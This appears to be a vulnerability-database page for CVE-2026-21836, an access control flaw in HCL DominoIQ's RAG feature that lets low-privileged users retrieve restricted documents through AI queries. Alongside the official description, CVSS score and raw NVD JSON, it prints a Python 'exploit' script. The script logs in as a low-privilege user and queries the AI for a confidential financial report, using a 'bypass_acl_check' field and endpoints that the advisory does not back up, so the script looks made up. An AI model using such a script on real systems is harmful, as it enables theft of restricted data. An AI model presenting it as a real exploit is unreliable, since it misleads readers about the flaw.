CVE-2026-21836

Description

The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL DominoIQ RAG feature (具体受影响版本请参考HCL官方安全公告KB0130932)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
TARGET_URL = "https://target-dominoiq.example.com/api/rag/query"

# Attacker credentials (Low privilege)
AUTH_CREDS = {
    "username": "low_priv_user",
    "password": "password123"
}

def exploit_cve_2026_21836():
    session = requests.Session()

    # Step 1: Authenticate
    print("[+] Authenticating...")
    login_resp = session.post("https://target-dominoiq.example.com/api/login", json=AUTH_CREDS)
    if login_resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Send AI Query designed to retrieve sensitive documents
    # The attacker asks for data that should be restricted
    payload = {
        "query": "Summarize the contents of the confidential financial report for Q1",
        "context": "bypass_acl_check"
    }

    print("[+] Sending malicious AI query...")
    response = session.post(TARGET_URL, json=payload)

    if response.status_code == 200:
        data = response.json()
        # Check if sensitive data is leaked in the AI response
        answer = data.get('answer', '')
        if 'confidential' in answer.lower() or 'financial' in answer.lower():
            print(f"[!] Potential data leakage detected:")
            print(answer)
        else:
            print("[+] Query processed, check manually for sensitive data.")
    else:
        print("[-] Query failed")

if __name__ == "__main__":
    exploit_cve_2026_21836()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21836
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21836
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21836/
[4] VulDB https://vuldb.com/cve/CVE-2026-21836
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21836", "sourceIdentifier": "[email protected]", "published": "2026-05-20T14:16:36.373", "lastModified": "2026-05-20T14:23:44.700", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932", "source": "[email protected]"}]}}